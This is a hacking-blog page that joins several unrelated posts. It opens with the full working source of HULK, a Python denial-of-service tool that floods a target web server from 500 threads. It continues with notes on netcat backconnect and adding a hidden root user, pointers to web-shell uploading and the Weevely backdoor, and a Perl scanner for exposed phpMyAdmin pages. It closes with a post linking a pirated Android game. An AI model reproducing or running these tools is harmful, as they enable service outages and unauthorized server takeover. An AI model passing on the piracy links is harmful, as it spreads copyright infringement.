HULK- HTTP UNBEARABLE LOAD KING

0x01 Introduction - This tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them to their knees by exhausting the resource pool, its is meant for research purposes only and any malicious usage of this tool is prohibited.

hulk.py Usage - python hulk.py www.url.com

# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author :  Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re


#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0


def inc_counter():
 global request_counter
 request_counter+=1


def set_flag(val):
 global flag
 flag=val


def set_safe():
 global safe
 safe=1


# generates a user agent array
def useragent_list():
 global headers_useragents
 headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
 headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
 headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
 return(headers_useragents)


# generates a referer array
def referer_list():
 global headers_referers
 headers_referers.append('http://www.google.com/?q=')
 headers_referers.append('http://www.usatoday.com/search/results?q=')
 headers_referers.append('http://engadget.search.aol.com/search?q=')
 headers_referers.append('http://' + host + '/')
 return(headers_referers)


#builds random ascii string
def buildblock(size):
 out_str = ''
 for i in range(0, size):
  a = random.randint(65, 90)
  out_str += chr(a)
 return(out_str)


def usage():
 print '---------------------------------------------------'
 print 'USAGE: python hulk.py <url>'
 print 'you can add "safe" after url, to autoshut after dos'
 print '---------------------------------------------------'




#http request
def httpcall(url):
 useragent_list()
 referer_list()
 code=0
 if url.count("?")>0:
  param_joiner="&"
 else:
  param_joiner="?"
 request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
 request.add_header('User-Agent', random.choice(headers_useragents))
 request.add_header('Cache-Control', 'no-cache')
 request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
 request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
 request.add_header('Keep-Alive', random.randint(110,120))
 request.add_header('Connection', 'keep-alive')
 request.add_header('Host',host)
 try:
   urllib2.urlopen(request)
 except urllib2.HTTPError, e:
   #print e.code
   set_flag(1)
   print 'Response Code 500'
   code=500
 except urllib2.URLError, e:
   #print e.reason
   sys.exit()
 else:
   inc_counter()
   urllib2.urlopen(request)
 return(code)  




#http caller thread 
class HTTPThread(threading.Thread):
 def run(self):
  try:
   while flag<2:
    code=httpcall(url)
    if (code==500) & (safe==1):
     set_flag(2)
  except Exception, ex:
   pass


# monitors http threads and counts requests
class MonitorThread(threading.Thread):
 def run(self):
  previous=request_counter
  while flag==0:
   if (previous+100<request_counter) & (previous<>request_counter):
    print "%d Requests Sent" % (request_counter)
    previous=request_counter
  if flag==2:
   print "\n-- HULK Attack Finished --"


#execute 
if len(sys.argv) < 2:
 usage()
 sys.exit()
else:
 if sys.argv[1]=="help":
  usage()
  sys.exit()
 else:
  print "-- HULK Attack Started --"
  if len(sys.argv)== 3:
   if sys.argv[2]=="safe":
    set_safe()
  url = sys.argv[1]
  if url.count("/")==2:
   url = url + "/"
  m = re.search('http\://([^/]*)/?.*', url)
  host = m.group(1)
  for i in range(500):
   t = HTTPThread()
   t.start()
  t = MonitorThread()
  t.start()Author :

Add root user

[+] Listening on port 1234 netcat

Requirements: Must be IP NAT Lan port 1234 on the previous 

Here is 192.168.1.4

[+] Backconnect on

[+] Execute exploit
. / ex

[+] Adduser command

 useradd-g 0-G root, bin, daemon, sys, adm, disk-o-u-p 123 456 0 r00t

 

[+] Del user
userdel r00t

Rooting

Hello Guys this is a small r00ting video made by me long time back...

it will give you an idea how server is rooted....

Hope you like it :)

Click here

SHELL UPLOADING VIA TAMPER DATA

HELLO GUYS I HAVE ALREADY POSTED TUTS ON MANUAL SQL INJECTION AND SQL INJECTION VIA TOOL LIKE SQLMAP...
BUT TODAY ILL SHOW YOU HOW TO UPLOAD SHELL ONCE YOU HAVE THE ADMIN ACCESS :)
HERE IS THE VIDEO TUT
HOPE YOU GUYS FIND IT USEFUL
DOWNLOAD TAMPER DATA ADDON (GOOGLE IT)
Get video here 
PASS: hackerzadda.com

WEEVELY A TINY BACKDOOR

Download link

click here
 Pass:- www.hackerzadda.com

PHPMYADMIN FINDER

HERE IS THE PERL SCRIPT WHICH WILL HELP YOU TO FIND PHPMYADMIN PAGE

#!/usr/bin/perl
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
#
#                ////////////////////////////////////
#                        Yakamoz PHPmyadmin Finder v.x.x
#                ////////////////////////////////////
#
#    Title : PHPmyadmin Finder
#    Author: !-Bb0yH4cK3r_Dz-!
#    From : Azarbycan
#    Category : Remote
#    Emails : !-Bb0yH4cK3r_Dz-!@Yahoo.com , !-Bb0yH4cK3r_Dz-!@Hotmail.com , !-Bb0yH4cK3r_Dz-!@Gmail.com
#       
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

    use HTTP::Request;
    use LWP::UserAgent;
       
       
system ("cls");
system ("title !-Bb0yH4cK3r_Dz-! (Yakamoz)...");
print "\t\t/////////////////////////////////////////////////\n";   
print "\t\t_________________________________________________\n";
print "\t\t\t PHPmyadmin Finder v.x.x\n";
print "\t\t\t Coded By !-Bb0yH4cK3r_Dz-!\n";
print "\t\t\t Made In Azarbycan\n";
print "\t\t\t Version In English\n";
print "\t\t_________________________________________________\n";
print "\n\n";
sleep (1);
    print "\n\n";
    print "\t HOST=> (ex: http://www.site.com)\n";
    print "\t HOST=> :";
    $host=<STDIN>;
    chomp($host);
    if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "\t\t*-*-*-*-*-* Scanning *-*-*-*-*-*\n";
print "\n\n";
@p = ("/phpMyAdmin/",
"/phpmyadmin/",
"/PMA/",
"/admin/",
"/dbadmin/",
"/mysql/",
"/myadmin/",
"/phpmyadmin2/",
"/phpMyAdmin2/",
"/phpMyAdmin-2/",
"/php-my-admin/",
"/phpMyAdmin-2.2.3/",
"/phpMyAdmin-2.2.6/",
"/phpMyAdmin-2.5.1/",
"/phpMyAdmin-2.5.4/",
"/phpMyAdmin-2.5.5-rc1/",
"/phpMyAdmin-2.5.5-rc2/",
"/phpMyAdmin-2.5.5/",
"/phpMyAdmin-2.5.5-pl1/",
"/phpMyAdmin-2.5.6-rc1/",
"/phpMyAdmin-2.5.6-rc2/",
"/phpMyAdmin-2.5.6/",
"/phpMyAdmin-2.5.7/",
"/phpMyAdmin-2.5.7-pl1/",
"/phpMyAdmin-2.6.0-alpha/",
"/phpMyAdmin-2.6.0-alpha2/",
"/phpMyAdmin-2.6.0-beta1/",
"/phpMyAdmin-2.6.0-beta2/",
"/phpMyAdmin-2.6.0-rc1/",
"/phpMyAdmin-2.6.0-rc2/",
"/phpMyAdmin-2.6.0-rc3/",
"/phpMyAdmin-2.6.0/",
"/phpMyAdmin-2.6.0-pl1/",
"/phpMyAdmin-2.6.0-pl2/",
"/phpMyAdmin-2.6.0-pl3/",
"/phpMyAdmin-2.6.1-rc1/",
"/phpMyAdmin-2.6.1-rc2/",
"/phpMyAdmin-2.6.1/",
"/phpMyAdmin-2.6.1-pl1/",
"/phpMyAdmin-2.6.1-pl2/",
"/phpMyAdmin-2.6.1-pl3/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2-beta1/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2/",
"/phpMyAdmin-2.6.2-pl1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-rc1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-pl1/",
"/phpMyAdmin-2.6.4-rc1/",
"/phpMyAdmin-2.6.4-pl1/",
"/phpMyAdmin-2.6.4-pl2/",
"/phpMyAdmin-2.6.4-pl3/",
"/phpMyAdmin-2.6.4-pl4/",
"/phpMyAdmin-2.6.4/",
"/phpMyAdmin-2.7.0-beta1/",
"/phpMyAdmin-2.7.0-rc1/",
"/phpMyAdmin-2.7.0-pl1/",
"/phpMyAdmin-2.7.0-pl2/",
"/phpMyAdmin-2.7.0/",
"/phpMyAdmin-2.8.0-beta1/",
"/phpMyAdmin-2.8.0-rc1/",
"/phpMyAdmin-2.8.0-rc2/",
"/phpMyAdmin-2.8.0/",
"/phpMyAdmin-2.8.0.1/",
"/phpMyAdmin-2.8.0.2/",
"/phpMyAdmin-2.8.0.3/",
"/phpMyAdmin-2.8.0.4/",
"/phpMyAdmin-2.8.1-rc1/",
"/phpMyAdmin-2.8.1/",
"/phpMyAdmin-2.8.2/",
"/sqlmanager/",
"/mysqlmanager/",
"/p/m/a/",
"/PMA2005/",
"/pma2005/",
"/phpmanager/",
"/php-myadmin/",
"/phpmy-admin/",
"/webadmin/",
"/sqlweb/",
"/websql/",
"/webdb/",
"/mysqladmin/",
"/mysql-admin/");


foreach $myadmin(@p){

$url = $host.$myadmin;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);
if ($response->is_success){print "Found : $url\n";}
if ($response->content=~ /Access Denied/){print "Found : $url =>[Error & Access Denied]\n";}
else {print "NotFound : $myadmin\n";}

   

}

NEED FOR SPEED HOT PURSIT TOUCH FIXED

Feel the rush of the escape and the thrill of the takedown!

Outrun the law as a Racer in supercars like the Pagani Zonda Cinque – or stop racers cold as a Cop in high-speed police interceptors like the Lamborghini Reventon. Experience pulse-pounding action as you make the escape – or make the bust – with Need for Speed Hot Pursuit™ on Android.

CHASE ACHIEVEMENTS

Drive up to 20 precision-performance cars in adrenaline-fueled showdowns across 24 day-and-night tracks. Take it to the limit in 48 total Cop and Racer Career Events, collect bounty, and rise to the top of the ranks.

DUEL IT OUT ON THE ROAD

As a Cop, lay down the law with roadblocks and spike strips – or fry the Racer’s electrical system with an EMP lock. As a Racer, make the getaway with overdrive, jamming, and oil slicks. Duel it out on the road!

From the #1 interactive racing franchise, bring the heat with Need for Speed Hot Pursuit!

Android Requirements: 2.3 or Above

Need Rooted Phones? : No

Download Links:

Need For Speed APK+Data Part1(HVGA,QVGA,WVGA)

Need For Speed APK+Data Part2(HVGA,QVGA,WVGA)

Need For Speed APK+Data Part3(HVGA,QVGA,WVGA)

Install apk and extract data in SDCard/Android/Data/ and play.

Tested On Galaxy ace Working 100%

Source:-andropalace.net